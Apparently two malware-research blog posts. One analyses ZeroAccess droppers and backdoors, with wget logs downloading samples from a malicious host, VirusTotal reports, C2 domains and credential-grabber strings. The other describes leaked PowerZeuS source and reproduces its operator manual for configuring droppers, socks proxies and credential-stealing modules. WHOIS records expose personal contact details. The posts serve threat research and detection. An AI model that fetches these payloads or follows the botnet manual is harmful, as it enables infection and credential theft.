address:        Mir Telematiki Ltd Petr Chayanov Lva Tolstogo, 19/2 119021 Moscow RUSSIAN FEDERATION
phone:          +74992463587
fax-no:         +74992463587
mnt-ref:        MTLM-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
abuse-mailbox:  abuse@hostkey.ru
abuse-c:        HA2800-RIPE
source:         RIPE # Filtered

person:         Peter Chayanov
address:        Moscow, Russia
phone:          +7 499 246 3587
nic-hdl:        PC7356-RIPE
mnt-by:         MTLM-MNT
abuse-mailbox:  abuse@hostkey.ru
source:         RIPE # Filtered
Same actors controls these domains, non-hacked site: 
Domain ID:D48479867-LRMS
Domain Name:ARTISANENT.INFO
Created On:24-Nov-2012 12:27:33 UTC
Last Updated On:24-May-2013 12:39:48 UTC
Expiration Date:24-Nov-2013 12:27:33 UTC
Sponsoring Registrar:GoDaddy.com, LLC (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:CR143925388
Registrant Name:wu liao
Registrant Organization:
Registrant Street1:xinyierbai 1-203
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:beijing
Registrant Postal Code:10000
Registrant Country:CN
Registrant Phone:+86.13564859684
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:wuliaijod20d13@hotmail.com
Name Server:NS71.DOMAINCONTROL.COM
Name Server:NS72.DOMAINCONTROL.COM

Domain ID:D48479867-LRMS
Domain Name:ARTISANENT.INFO
Created On:24-Nov-2012 12:27:33 UTC
Last Updated On:24-May-2013 12:39:48 UTC
Expiration Date:24-Nov-2013 12:27:33 UTC
Sponsoring Registrar:GoDaddy.com, LLC (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:CR143925388
Registrant Name:wu liao
Registrant Organization:
Registrant Street1:xinyierbai 1-203
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:beijing
Registrant Postal Code:10000
Registrant Country:CN
Registrant Phone:+86.13564859684
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:wuliaijod20d13@hotmail.com
Name Server:NS71.DOMAINCONTROL.COM
Name Server:NS72.DOMAINCONTROL.COM

The Verdict

Downloaded PoC: 

--2013-10-07 15:29:00--  h00p://gtrfeds.artisanent.info/m.exe
Resolving gtrfeds.artisanent.info... 158.255.6.116
Connecting to gtrfeds.artisanent.info|158.255.6.116|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 211968 (207K) [application/x-msdownload]
Saving to: `m.exe'
100%[=================================>] 211,968      110K/s   in 1.9s
2013-10-07 15:29:03 (110 KB/s) - `m.exe' saved [211968/211968]


--2013-10-07 15:29:12--  h00p://gtrfeds.artisanent.info/zs.exe
Resolving gtrfeds.artisanent.info... 158.255.6.116
Connecting to gtrfeds.artisanent.info|158.255.6.116|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52736 (52K) [application/x-msdownload]
Saving to: `zs.exe'
100%[=================================>] 52,736      56.4K/s   in 0.9s
2013-10-07 15:29:14 (56.4 KB/s) - `zs.exe' saved [52736/52736]
These are the samples: 
2013/10/01  00:58  211,968 m.exe 8df1f6f7cf864df50f02cbab508564b0
2013/09/30  00:58  52,736 zs.exe 872031e4b8f8abfcadecb754a4f383a2
And the evidence of my download:


In Virus Total the report it shows: 

   URL: https://www.virustotal.com/en/file/9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937/analysis/
   SHA256: 9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937
   SHA1: d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
   MD5: 8df1f6f7cf864df50f02cbab508564b0
   File size: 207.0 KB ( 211968 bytes )
   File name: m.exe
   File type: Win32 EXE
   Tags: peexe
   Detection ratio: 29 / 45
   Analysis date: 2013-10-03 05:47:16 UTC ( 4 days, 1 hour ago )
---------------------------------------------------------------------
        Antivirus                  Result              Update
---------------------------------------------------------------------
   Bkav                 HW32.CDB.5ccc                 20131002
   MicroWorld-eScan     Trojan.Generic.9635821        20131003
   McAfee               ZeroAccess-FBJ!8DF1F6F7CF86   20131003
   Malwarebytes         Rootkit.0Access.RC            20131003
   K7AntiVirus          Riskware                      20131002
   K7GW                 Riskware                      20131002
   Norman               ZAccess.BHJZ                  20131002
   TrendMicro-HouseCall TROJ_GEN.F0C2C00J213          20131003
   Avast                Win32:Malware-gen             20131003
   Kaspersky            Backdoor.Win32.ZAccess.ecid   20131003
   BitDefender          Trojan.Generic.9635821        20131003
   SUPERAntiSpyware     Trojan.Agent/Gen-ZAccess      20131003
   Sophos               Mal/ZAccess-BL                20131003
   Comodo               UnclassifiedMalware           20131003
   F-Secure             Trojan.Generic.9635821        20131003
   AntiVir              TR/Rogue.9635412              20131002
   TrendMicro           TROJ_GEN.F0C2C00J213          20131003
   McAfee-GW-Edition    Artemis!8DF1F6F7CF86          20131003
   Emsisoft             Trojan.Generic.9635821 (B)    20131003
   Antiy-AVL            Backdoor/Win32.ZAccess.gen    20131003
   Kingsoft             Win32.Troj.Generic.a.(kcloud) 20130829
   Microsoft            TrojanDropper:Win32/Sirefef   20131003
   AhnLab-V3            Backdoor/Win32.ZAccess        20131002
   GData                Trojan.Generic.9635821        20131003
   ESET-NOD32           Win32/Sirefef.FY              20131002
   Ikarus               Trojan.Crypt2                 20131003
   Fortinet             W32/ZAccess.AX!tr             20131003
   AVG                  Crypt2.BJIS                   20131002
   Panda                Trj/Genetic.gen               20131002
and... 
   URL: https://www.virustotal.com/en/file/8b807576a649a8a6c00ce8b4c655a050ac791ce0dfe1d99fae0d6e4467e069c1/analysis/
   SHA256: 8b807576a649a8a6c00ce8b4c655a050ac791ce0dfe1d99fae0d6e4467e069c1
   SHA1: a4b84fb5f160bc68ce6f6200c2aba05648909ec4
   MD5: 872031e4b8f8abfcadecb754a4f383a2
   File size: 51.5 KB ( 52736 bytes )
   File name: zs.exe
   File type: Win32 EXE
   Tags: peexe aspack
   Detection ratio: 32 / 48
   Analysis date: 2013-10-07 05:42:45 UTC ( 1 hour, 56 minutes ago )

--------------------------------------------------------------------------------
        Antivirus                          Result                     Update
--------------------------------------------------------------------------------

   Bkav                 HW32.CDB.70c0                                20131005
   MicroWorld-eScan     Gen:Variant.Graftor.116502                   20131007
   McAfee               RDN/Generic Downloader.x!in                  20131007
   Malwarebytes         Trojan.Delf.UKN                              20131007
   K7AntiVirus          Trojan                                       20131004
   K7GW                 Trojan                                       20131004
   Symantec             WS.Reputation.1                              20131007
   Norman               Troj_Generic.QBBRJ                           20131007
   TrendMicro-HouseCall TROJ_DLOADE.FCX                              20131007
   Avast                Win32:Malware-gen                            20131007
   Kaspersky            Trojan-Downloader.Win32.Delf.bbcn            20131007
   BitDefender          Gen:Variant.Graftor.116502                   20131007
   Agnitum              Trojan.DL.Delf!1XVARP0nySk                   20131006
   Emsisoft             Gen:Variant.Graftor.116502 (B)               20131007
   Comodo               UnclassifiedMalware                          20131007
   F-Secure             Gen:Variant.Graftor.116502                   20131007
   VIPRE                Trojan.Win32.Generic!BT                      20131007
   AntiVir              TR/Graftor.116502                            20131007
   TrendMicro           TROJ_DLOADE.FCX                              20131007
   McAfee-GW-Edition    Heuristic.BehavesLike.Win32.Suspicious-PKR.G 20131006
   Sophos               Mal/Generic-S                                20131007
   Panda                Trj/CI.A                                     20131006
   Kingsoft             Win32.TrojDownloader.Delf.bb.(kcloud)        20130829
   Microsoft            Trojan:Win32/Orsam!rts                       20131007
   AhnLab-V3            Downloader/Win32.Delf                        20131006
   GData                Gen:Variant.Graftor.116502                   20131007
   VBA32                suspected of Trojan.Downloader.gen.h         20131005
   ESET-NOD32           a variant of Win32/TrojanDownloader.Delf.RWG 20131007
   Ikarus               Win32.SuspectCrc                             20131007
   Fortinet             W32/Delf.RWG!tr.dldr                         20131007
   AVG                  Downloader.Generic13.BNCS                    20131006
   Baidu-International  Trojan.Win32.Downloader.Delf.RWG             20131006

Payload Details

m.exe 


Info:
================================================================================
File Name:      m.exe
File Size:      211968 byte
Compile Time:   2005-03-30 03:17:14 <=== Fakes
DLL:            False
Sections:       4
MD5   hash:     8df1f6f7cf864df50f02cbab508564b0
SHA-1 hash:     d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
Anti Debug:     Yes
Anti VM:        None
--------------------------------------------------------------------------------
Size:    211968 bytes
Type:    PE32 executable (GUI) Intel 80386, for MS Windows
MD5:     8df1f6f7cf864df50f02cbab508564b0
SHA1:    d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
Date:    0x42499BAA [Tue Mar 29 18:17:14 2005 UTC] <== Fakes..Builder made..
EP:      0x404c0c .text  0/4 [SUSPICIOUS]
CRC:     Claimed: 0x33fe1, Actual: 0x33fe1
--------------------------------------------------------------------------------
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 04 00 AA 9B 49 42 00 00 00 00    PE..L.....IB....
0090   00 00 00 00 E0 00 82 81 0B 01 42 18 00 72 00 00    ..........B..r..
00A0   00 C6 02 00 00 00 00 00 0C 4C 00 00 00 10 00 00    .........L......
[...]

Sections:
================================================================================
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x718c       0x7200       4.942657
.rsrc      0x9000       0x29ca4      0x29e00      6.244711
.reloc     0x33000      0x244        0x400        1.173713
.rdata     0x34000      0x2228       0x2400       5.573327

File and URL:
================================================================================
FILE:           kernel32.dll
FILE:           user32.dll
FILE:           d3d8thk.dll
FILE:           kernel32.dll
FILE:           user32.dll
FILE:           KERNEL32.DLL
FILE:           OPENGL32.dll
FILE:           advapi32.dll
FILE:           d3d8.dll
FILE:           d3d8thk.dll
FILE:           reity.exe
URL:            None

Suspicious API Functions:
================================================================================
Func. Name:     OpenFileMappingA
Func. Name:     GetModuleHandleA
Func. Name:     FindResourceExA
Func. Name:     GetModuleFileNameA
Func. Name:     GetComputerNameA
Func. Name:     VirtualAllocEx  <=====
Func. Name:     VirtualAllocEx  <=====
Func. Name:     GetTempPathA
Func. Name:     GetModuleFileNameA
Func. Name:     IsDebuggerPresent
Func. Name:     FindResourceExW
Func. Name:     GetVersionExA
Func. Name:     GetFileAttributesExA
Func. Name:     GetFileAttributesExA
Func. Name:     SetWindowsHookExA
Func. Name:     GetProcAddress
Func. Name:     FindResourceA
Func. Name:     ConnectNamedPipe
Func. Name:     FindFirstFileA
Func. Name:     VirtualProtectEx
Func. Name:     GetFileAttributesA
Func. Name:     GetComputerNameA

Suspicious API Anti-Debug:
Anti Debug:     IsDebuggerPresent

Version info
================================================================================
LegalCopyright: Voleter it(c) \xa9 2012
InternalName: ejbnisgj
FileVersion: a 2 RC87.44060017.189e
CompanyName: Voleter it(c)
ProductName: Voleter it(c)
ProductVersion: 122.19153 RelC
FileDescription: Voleter it(c)
OriginalFilename: ejbnisgj.exe
Translation: 0x0409 0x04b0
I won't write much this in very details, please refer to my previous analysis-->HERE in the binary part, to tell us a lot. Please see the correct statement in VirusTotal behavior analysis here-->HERE, but see the VT summary is below:

The usage of GeoIP: the attempt to download it from MaxMind site and the UDP communication tells usual pattern of ZA.
Again, please refer to this-->HERE for the details.

PoC of ZeroAccess Botnet is up and alive

ZeroAccess network:

When I run it.. below is the DNS communication, I gave ZA all they want to access the botnet (if there is a botnet still up..)

Honestly, why I did not see ANY downtime of these ZeroAccess peer communication?
Now hickups or slowdown in this communication at all, what really was shutdowned??
Later on in the PCAP sample you can count yourself how fast the rotation peer access were called, this is just as per usual speed I saw in previous analysis of ZeroAccess, nothing changed (sadly..)

The ZeroAccess "acompanied" Trojan "A" - downloader: zs.exe

Binary info: 

File:    ./zs.exe
Size:    52736 bytes
Type:    PE32 executable (GUI) Intel 80386, for MS Windows
MD5:     872031e4b8f8abfcadecb754a4f383a2
SHA1:    a4b84fb5f160bc68ce6f6200c2aba05648909ec4
Date:    0x5247BBB7 [Sun Sep 29 05:33:43 2013 UTC]
EP:      0x42e001 .DB 10/12 [SUSPICIOUS]
CRC:     Claimed: 0x0, Actual: 0x1a3f8 [SUSPICIOUS]
--------------------------------------------------------------------------------
Packer:
ASProtect V2.X DLL -> Alexey Solodovnikov - additionalASProtect V2.X DLL -> Alexey Solodovnikov
ASPack v2.12 - additionalASPack v2.12
ASPack v2.1 - additional
--------------------------------------------------------------------------------
File Name:      zs.exe
File Size:      52736 byte
Compile Time:   2013-09-29 14:33:43
DLL:            False
Sections:       12
MD5   hash:     872031e4b8f8abfcadecb754a4f383a2
SHA-1 hash:     a4b84fb5f160bc68ce6f6200c2aba05648909ec4
Anti Debug:     None
Anti VM:        None
---------------------------------------------------------------------------------
Entry Point at 0xbc01
Virtual Address is 0x42e001

0000   4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00    MZP.............
0010   B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00    ................
0040   BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90    ........!..L.!..
0050   54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73    This program mus
0060   74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57    t be run under W
0070   69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00    in32..$7........
0080   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
 [...]
00F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0100   50 45 00 00 4C 01 0C 00 B7 BB 47 52 00 00 00 00    PE..L.....GR....
0110   00 00 00 00 E0 00 8E 81 0B 01 02 19 00 C2 01 00    ................
0120   00 62 00 00 00 00 00 00 01 E0 02 00 00 10 00 00    .b..............
0130   00 E0 01 00 00 00 40 00 00 10 00 00 00 02 00 00    ......@.........
[...]

Resource entries
================================================================================
Name               RVA      Size     Lang         Sublang                  Type
--------------------------------------------------------------------------------
RT_STRING          0x2c218  0x74     LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c28c  0x298    LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c524  0xd4     LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c5f8  0xa4     LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c69c  0x29c    LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c938  0x368    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_STRING          0x2cca0  0x288    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_RCDATA          0x2cf28  0x10     LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_RCDATA          0x2cf38  0x128    LANG_NEUTRAL SUBLANG_NEUTRAL          empty

Sections
================================================================================
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x1c000      0x9800       7.985545    [SUSPICIOUS]
.itext     0x1d000      0x1000       0x400        6.023927
.data      0x1e000      0x2000       0xa00        7.169703    [SUSPICIOUS]
.bss       0x20000      0x5000       0x0          0.000000    [SUSPICIOUS]
.idata     0x25000      0x1000       0x600        6.466433
.didata    0x26000      0x1000       0x200        2.176323
.tls       0x27000      0x1000       0x0          0.000000    [SUSPICIOUS]
.rdata     0x28000      0x1000       0x200        0.210826    [SUSPICIOUS]
.reloc     0x29000      0x3000       0x0          0.000000    [SUSPICIOUS]
.rsrc      0x2c000      0x2000       0x800        6.544777
.DB        0x2e000      0x2000       0x1200       5.804077
.adata     0x30000      0x1000       0x0          0.000000    [SUSPICIOUS]
--------------------------------------------------------------------------------
File and URL:
FILE:           kernel32.dll
FILE:           user32.dll
FILE:           kernel32.dll
FILE:           oleaut32.dll
FILE:           advapi32.dll
FILE:           user32.dll
FILE:           user32.dll
URL:            None
--------------------------------------------------------------------------------
Suspicious API Functions:
Func. Name:     GetProcAddress
Func. Name:     GetModuleHandleA
Func. Name:     LoadLibraryA
Func. Name:     LoadLibraryA
--------------------------------------------------------------------------------
Suspicious Sections:
Sect. Name:     .text^@^@^@
MD5   hash:     607a461cb659e5a10b566434de7fa3d3
SHA-1 hash:     b1bf940acbcb37877a5513d7385765d1937a0ea1
Sect. Name:     .data^@^@^@
MD5   hash:     46564b11f19cb7c4fd0da8e27fd4f394
SHA-1 hash:     03f78fc221ae145c9311ef0bfd98b0d6e3acd793
Sect. Name:     .bss^@^@^@^@
MD5   hash:     d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash:     da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name:     .tls^@^@^@^@
MD5   hash:     d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash:     da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name:     .rdata^@^@
MD5   hash:     3dbb241e3190fbd14c8a44da3a00e61b
SHA-1 hash:     8247038ba6b52fb73328ca11fe47df8633ced36f
Sect. Name:     .reloc^@^@
MD5   hash:     d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash:     da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name:     .adata^@^@
MD5   hash:     d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash:     da39a3ee5e6b4b0d3255bfef95601890afd80709

What does it do? Yes, is a downloader, ALIVE one:, it downloaded WHAT LOOKS LIKE IMAGE FILE from dswarqryg.com

You'll see some requests like below:
..with each request session is:

..and redirect you to download these: 

PS: BLOCK THESE DOMAINS!!!
idwrlliewrwp.com/ssany.jpg
sd.newaot.com/xxswq.jpg
PoC:


Of course the purpose is the camouflage of PE file download blocking:

We can see it actualy saved in %TEMP%...

As PE binaries of ANOTHER malware file...

We found also others download URL and saved file name in the binary:

And from reversing, it showed it is targeted to below OS version: 
32-bit Edition
64-bit Edition
Windows Server 2003
Windows Server 2003 R2
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 2000
Windows XP

Zero Access "Accompanied" Trojan "B" - the Backdoor as Service:"SpringSvc.exe"

Well, the binary downloaded to be saved in the %WINDOWS% directory with below VT details: 

   URL: https://www.virustotal.com/en/file/0ddb20210558a5d95aa90ebbda3c666b46321af1c70319ce8aebbc1dfcfd754e/analysis/
   SHA256:0ddb20210558a5d95aa90ebbda3c666b46321af1c70319ce8aebbc1dfcfd754e
   SHA1: 6388534e59b78f1d68165ab454f3f5bfd3803fde
   MD5: 9b34ca74c08a890af5b9f692d68516c3
   File size: 354.0 KB ( 362496 bytes )
   File name: SpringSvc.exe
   File type: Win32 EXE
   Tags: peexe
   Detection ratio: 23 / 48
   Analysis date: 2013-10-07 11:27:28 UTC ( 2 minutes ago )
--------------------------------------------------------------------------
        Antivirus                        Result                   Update
--------------------------------------------------------------------------
   Bkav                 HW32.CDB.B3ff                            20131007
   MicroWorld-eScan     Gen:Trojan.Heur.FU.wS0@aKIipfmj          20131007
   CAT-QuickHeal        (Suspicious) - DNAScan                   20131007
   McAfee               Artemis!9B34CA74C08A                     20131007
   Malwarebytes         Trojan.Agent.EDC                         20131007
   K7AntiVirus          Trojan                                   20131004
   K7GW                 Trojan                                   20131004
   Symantec             WS.Reputation.1                          20131007
   TrendMicro-HouseCall TROJ_GEN.R0CBH07J613                     20131007
   Kaspersky            Trojan.Win32.Agent.acbkp                 20131007
   BitDefender          Gen:Trojan.Heur.FU.wS0@aKIipfmj          20131007
   Agnitum              Suspicious!SA                            20131006
   Sophos               Mal/Generic-S                            20131007
   F-Secure             Gen:Trojan.Heur.FU.wS0@aKIipfmj          20131007
   AntiVir              TR/Spy.362496.35                         20131007
   McAfee-GW-Edition    Heuristic.LooksLike.Win32.SuspiciousPE.C 20131007
   Emsisoft             Gen:Trojan.Heur.FU.wS0@aKIipfmj (B)      20131007
   Panda                Suspicious file                          20131007
   GData                Gen:Trojan.Heur.FU.wS0@aKIipfmj          20131007
   AhnLab-V3            Trojan/Win32.Agent                       20131007
   ESET-NOD32           a variant of Win32/Spy.Wagiclas.AC       20131007
   Fortinet             W32/Agent.ACBKP!tr                       20131007
   AVG                  PSW.Generic12.AYU                        20131007
..and the binary was compiled by Borland-base Builder/SDK 
FastMM Borland Edition 
2004, 2005 Pierre le Riche / Professional Software Development
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
Software\Borland\Delphi\Locales

OK.. OK..OK, got it! But WHAT does it Do??

This downloaded file will be executed by the previous downloader:

And does the process injection the reside as service:
PoC of service calls from reversing: 

StartServiceA
StartServiceCtrlDispatcherA
CreateServiceA
And then this SpringSvc.exe contacts mothership in kdsousom.com / 67.198.168 .115 which poking for "package":

And a grabber: 

<form
name="
name=
type="hidden"
type=hidden
<input
value=
/select>
/textarea>
</form
Elements
Item
Forms
Length
tagName
INPUT
type
text
Name
Value
...of the phishing credential data: 
NAME
FIRST
title
LAST
PHONE
ZIP
MAIL
BIRTH
YYYY
yyyy
password
checkbox
checked
radio
checked
checked
TEXTAREA
call me,Thank you.
not sure
SELECT
sex
options
length
text
selectedindex
onchange
value
selectedindex
SUBMIT
SEARCH
Value
LOGIN
SIGN IN
submit
Click

Yes, is a backdoor requesting and passing credentials which we're sure there's nothing good in it..

Epilogue

Friends, my point is simple, ZeroAccess is out there still lurking at us.
These samples and network are fresh and new.. this post is a PoC of the existance of ZeroAccess in the wild.
Any of the bad domains mentioned are exposed as target to be shutdown.
I will share the samples shortly, after sorting things out. Stay secure!

Additional

Samples Download

We share the samples and the malicious botnet traffic with trojan callback traffic for raising detection ratio and research purpose only to known researchers.
I will ask many questions to share the sample above to none of the described criteria.
Here's the downloads, click the picture to access:

Samples/PE Binaries

(password needed - ask by DM to @malwaremustdie in twitter)

Traffic in PCAP:

(no password)

#MalwareMustDie!

Search

KINS? No! PowerZeuS, yes! Source Code for View & Download

October 9, 2013, 10:45 am
$
0
0

Background

Finally announced publicly in social engineering media TODAY that the leaked source code of (updated) what we thought was KINS (/updated) was publicly exposed. We found out later on in the codes that there is no link to any current alive CnC with destination and/or pattern used by the known "realKINS", apart from some differences inside binary files. And (With thank's to "Invisible Kid" for suggestion to clarify this matter) found this toolkit is made based on known toolkit known as PowerLoader with an optional/additional ZeuS module/functions in a dll shape(indicated from Citadel stripped code actually), therefore, in "Ad Hoc", the "PowerZeus" looks like the "suitable naming" for this malware/toolkit itself.

Peeling the codes deeper, we found there is Bootkit codes from Carberp used; the loader which is leaving an old SpyEye traces (don't ask me why..); the form-grabber that are coming from the root of Zeus-based (found it in Citadel too); the gate web interface used was similar to what Pony/Zbot used with altogether tons of flaws in it.. it made me feel like seeing a re-union of Zeus family in one package. Our coder team also noticing the at least three different PHP coders were working in separated modules in separated time for the gate's codes.

Below is the simple grep traces of PoC of Builder code snips, explaining the modules used by the tookit, reference of Power Loader: 

make.py(262): def build_project(project, project_out, params, is_x64 = False):
make.py(384):     build_project('softwaregrabber','softwaregrabber.dll', params)
make.py(402):     build_project('socks_server','socks5Server32.dll', params)
make.py(420):     build_project('socks_server','socks5Server64.dll', params, True)
make.py(438):     build_project('mod-killer','mod-killer.dll', params)
make.py(456):     build_project('dropper','dropper32.exe', params)
make.py(474):     build_project('dropper','dropper64.exe', params, True)
make.py(492):     build_project('clientdll','client32.dll', params)
make.py(510):     build_project('clientdll','client64.dll', params, True)    
make.py(542):     build_project('builder', outfile, params)

I just finished reading all codes when I added this note, these are a must-have for the AV industry and researchers to understand the recent concept of form-grabber, bot networking used, the bootkit, the gate's codes and its vulnerabilities (I count 3 SQLi, 2 PHP/Escape flaws & 1 Escalation User Privilege exploits in the gate's codes which can be used to, erm, "mitigate" this threat *smile*)

Many of download source was announced, some contains the PUP with unnecessary backdoors which can actually infect you. So I feel is important to have a clean download for the AV filtration support and research purpose. If I may add, for the press and media gentlemen, this malware is not new news, but the public disclosure code part for this toolkit is.

Malware Product Description (in package)

Below I pasted as per it is, the malware (toolkit)'s product description found in the source code, please take a look at this description well, specially at the explanation on mod-killer, module socket (designed for grabbing softwaregrabber of FTP , email , pop3 data and certificates & integrated with a common neural networking, is bot base module to the kernel ) and the installation parts. The exported admin certificates password also written clearly in plain text: 

Product description:
itur1, url2, url3 - URLs on the gate dropper ( exe file).

In addition , there are two main slashes spare in case if your domain loknut .
This file should be progruzhat . It must be crypted .

delay - the delay otstuk

retry - interval core sampling bot.

buildid - the name dropper botnet .

encryption_key - encryption key.

url_server - admin Gate "B" , that is, admin core.

$ - Notifay .
! - A ban .
@ - Screenshots ( full-size ) .

macros :
% BOTID% - ID bot.
% opensocks% - automatic opening of the socks in the transition to H HRM .

captcha_server - interception of CAPTCHA . Works with AD. Leave as is.

After collecting the config files is issued shall be issued 3 - dropper.exe, 
bot32.dll, bot64.dll and just as you do is file softwaregrabber.dll,
which has already been assembled independently of the first three .

dropper.exe - dropper file ( 50 kb ), which pulls the core bot (2 cores , bot32.dll
 and bot64.dll). This file is crypted .

bot32.dll - kernel for 32-bit systems .....
: > kriptovat is not necessary . Avtokript memory . The modules are the basis of 
the bot and are responsible for the processes of injection and grabbing a browser .
bot64.dll - kernel for 64 -bit systems .....

softwaregrabber.dll - module port opening . Responsible for grabbing FTP \ Email \ 
pop3 \ Billing \ screen and check otstuk kernel modules. Kriptovat is not 
necessary . Avtokript memory .

The core of the bot. RULE OF COMMUNICATIONS AND DOWNLOADS . Pay special attention .

- Adding a file in the " Files" section. As jobs are added files bot32.dll, 
bot64.dll, softwaregrabber.dll and other modules , including third-party dll or exe files .
Name and version selected as desired. Bot communicates with the modules Zutick, 
Shylock, SpyEye, but without an open API ( optional) argument to leave empty.
Attention ! Communication with the module . First, load the kernel modules . 
In this case, the kernel modules should not be linked to anything . 
Next, load the module softwaregrabber.dll,
that should be associated with bot32.dll

- Give the job to the modules in the " job ." It should be noted key points : 
a) To select the kernel module loading mode " reusable "
Module softwaregrabber - " one-off " or " reusable " . 
b) Number of times (performance ) put a big number, eg 9999999 .

- Quest " written in the config ", " input commands manually " are available on
ly when you open API. Setting the "send logs " is available only for debug version,
which is done by request and in extreme cases. In this case, the installation 
logs dropper and obtaining rights go to the " logs " .

- Net \ dirty - a necessary attribute if you decide to download the bots in one hand.

- Updating the dll is on the circuit i +1 preserving the bot name in the files 
and assignments , if necessary update of sequence, and the scheme i, if the update
comes after the reboot .

- To update the statistics in the admin dropper , do not forget to add the task to CZK .

- The difference between the admin area "A" and "B" indicates the quality of 
your traffic. Cores bot ticking only after obtaining logs . In case
progruzhaetya kernel , say, Dedic , where there is no activity , the bot will 
appear in the admin "B" , but did not appear in the admin area "A".
You can always see the number of loaded cores bot in the " jobs " in the admin 
dropper . The difference in bad trafe may reach 90 %
we only show the balance of objective things.

The module mod-killer is designed to maintain the purity of your bots from 
third-party bots , unwanted software .
- Deleting Citadel (all), Zeus (all), SpyEye (all), IceIX (all), 
  Evolution (all) and their derivatives , Carberp ( exception - bootkit )
  Zutick, Lickat, Shylock, Gazavat (Sality).
- Delete a third-party malicious software, such as loaders , Rata , DDoS bots , based on heuristic analysis.
- Removal of unwanted software, such as click bots , bots spoofing issue , based on the heuristic analysis.
- Removal of the common bots even crypted form on the basis of signatures.
- Total integration with neural network bot. Analysis of unsigned software , processes, without windows, etc.

Installation Options :
Specify the arguments (arguments SpyEye in the admin core)
"77_uninstall;" - the removal of unwanted software , such as a boat- clickers , etc.
"77_replace_with = http://aa.ru/file.exe" ( if you have the software to progruz , 
but competitors will ship similar software on your bot ) swings on a new boat 
with RLS imunnitetom to deliteru - 77_uninstall
"Report;" - bug report in the admin area of the nucleus.
"Clean_zeus_based;" - delete all versions of popular signature-based bots .
The record of a line of several arguments. Each argument must end with "" .
Load module files , add to the value associated with the core bot32.dll

In order to use the module socks , do the transaction :
1 ) Find a server, it is desirable to Windows ( you can Dedicated Server with 
installed apache / nginx / xamp / denwer, in general, need a server
with installed php). Nix on Vine also supposed to work .
2) Fill socks_server folder on the server , we put all the 777 law.
3) Take gate.php link to the file on the server, remember .
4 ) Go to the admin panel dropper , add -ins and socks5Server32.dll socks5Server64.dll, 
in the arguments indicate the link from paragraph 3 ) .
Where to inject - explorer.exe.
5 ) Sox as IP: Port take in going to the link " your_server " / control.php, either from the log.txt
Sometimes we clean konnekshn we click in Kill Tasks. The terminal supports the 
socks fourth and fifth versions of standard rfc.
Authorization is not required. Volnovatsya about ports for bots do not need , 
they will take out of the gate .

WARNING ! The module must be connected to the core bot32.dll for socks5Server32.dll 
and bot64.dll c socks5Server64.dll respectively.
Attention ! In the tasks and files names must be exactly socks5Server32.dll and socks5Server64.dll
Auto open socks carried out on the macro / /% opensocks% in inzhekta .

The module is designed for grabbing softwaregrabber FTP , email , pop3 data and certificates.
The module is integrated with a common neural network is bot base module to the kernel .

Installation Options :
Specify the arguments (arguments SpyEye in the admin core)
